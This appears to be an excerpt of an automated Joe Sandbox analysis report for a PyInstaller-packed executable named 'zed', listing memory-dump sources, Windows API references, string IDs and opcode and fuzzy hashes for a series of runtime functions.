                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                                • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                                • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                                • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                                • Instruction ID: bc78c05571fc499864804b6f15a40d20b4c304078a26ca113c696004cd40314a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9321E562728B4542E720AB15F8647EAB364FB98B88F80013BEE8D97755DF3CD245C750
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF7E5301B99), ref: 00007FF7E5302760
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                                • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                                                • Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                                • Instruction ID: bd566b9dec2653db2e67b982f32086f3cb0b512d779a193ad1c9cae30992c2c5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 48219772628B8942E720EB51F8617E6A394FB98B88F80013AFE8D83659DF7CD1458751
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                • Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                                • Instruction ID: 12cf7716644fcc2f62418fda735bb25805308b7e5f6d1e9652c3b8b5b80541a7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0F06825B29B0A81FA10AB24E474379A325AF55F69F94023ED66E851E4DF3CE048C361
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _set_statfp
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1156100317-0
                                                                                                                                                                                                                                                • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                • Instruction ID: ccfe3ee0ba5148ab4aae3909dd2310fc9166a4b53fc1498aacaae63fc962090a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1C11932BD78E0A01F6543195E4B13799242AF78F68E840E3EEB6E862D6CE7C64C14122
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,00007FF7E531A5A3,?,?,00000000,00007FF7E531A83E,?,?,?,?,?,00007FF7E531A7CA), ref: 00007FF7E531B3AF
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF7E531A5A3,?,?,00000000,00007FF7E531A83E,?,?,?,?,?,00007FF7E531A7CA), ref: 00007FF7E531B3CE
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF7E531A5A3,?,?,00000000,00007FF7E531A83E,?,?,?,?,?,00007FF7E531A7CA), ref: 00007FF7E531B3F6
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF7E531A5A3,?,?,00000000,00007FF7E531A83E,?,?,?,?,?,00007FF7E531A7CA), ref: 00007FF7E531B407
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF7E531A5A3,?,?,00000000,00007FF7E531A83E,?,?,?,?,?,00007FF7E531A7CA), ref: 00007FF7E531B418
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                                                                                                • Opcode ID: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
                                                                                                                                                                                                                                                • Instruction ID: b952fffa2dddc72ababcc2dd48d0631e5cde09089aee0541111dd2545bc58b56
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 89113B20E2860A41F954B2759771379D2415F64BB8FC8863FD83ECB6D6DD3CA4519232
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                                                                                                • Opcode ID: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
                                                                                                                                                                                                                                                • Instruction ID: d6d879545b30c3d6b269303be1bdcdfea35474ea8c77461153d961973a6f97d8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1211E324E2820E81F9587271867137A92824F66B78E88463ED93ECE6D2DD3CB4465273
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: verbose
                                                                                                                                                                                                                                                • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                                • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                                • Instruction ID: 5bb7e140ddcd7fb31ea80694d38b8e6fe739489a80da4be902b5b558455c17ce
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA91F632A2864A41FB21AE74D66037DB791AB60F58FE4413BDA5D877C7DE3CE4058322
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                                • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                                • Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                                • Instruction ID: 421d6354dca0dc02c8122bdbcd76887095e0200fd2d20046c86a4205aede2028
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8281827AD2854B85E7647E358360379A6A0AB31F8CFD5503FCA09D7299CA3DE9019333
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                                • Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                                                • Instruction ID: 75e2494b3b66c3023d6a16ada4049a29d9a50f674627d3eb01c17bfbbcb03c4c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A151B022A2970A8ADB14AF15E024778B3D1EB64F8DF90453AEA4DC7744DF7CE841C751
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                                                                • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                • Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                                • Instruction ID: 5edb095671056a1fb4a348158c6a1b5c0b90955bdbea71bc2eab7a552954e919
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA61A336918BC986DB64EB15E4503AAF7A0FB94B8CF44422AEB9C43B55CF7CD190CB11
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm$csm
                                                                                                                                                                                                                                                • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                • Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                                • Instruction ID: 4f216c8273ae495be7483670f2dbd264a8cc47da63ad84f141bfdee3893afbe3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BC51953662834A86DB64AB21906436AB790FB64F9CF94413FDE4C87B85CF3CE460C712
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Message
                                                                                                                                                                                                                                                • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                                • API String ID: 2030045667-255084403
                                                                                                                                                                                                                                                • Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                                • Instruction ID: 96d1846a6377352224e8f6ce9384322de27dfe6f569cbf31387e68f9c406b7bf
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B321D362728B4582E710AB15F8647EAB364EB98B88F80013AEA8D93656DE3CD245C750
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2718003287-0
                                                                                                                                                                                                                                                • Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                                • Instruction ID: 56e6d704278b9de0b1ba23a9ea116c05dbdeb5e26de1d27910342f8959c33b0c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 57D10372B28A5889E711DF75C5502ACB7A1FB64B9CB84423ACF4ED7B89DE38D016C311
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1956198572-0
                                                                                                                                                                                                                                                • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                                • Instruction ID: 1a8d77651a934577f7178000e035ac17628df50e4f788bbcd347fa2d4c35b0ea
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C114021F2C64A42F664A769E5A437EA251EFA4F8CFC44036EF4943B89CD3CE4D08311
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: ?
                                                                                                                                                                                                                                                • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                                • Opcode ID: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                                                                                                                                                                                • Instruction ID: 0e0dca3562d0e6e530beb814eb1a2a3c61862a6f995446868018876b57e9de8c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
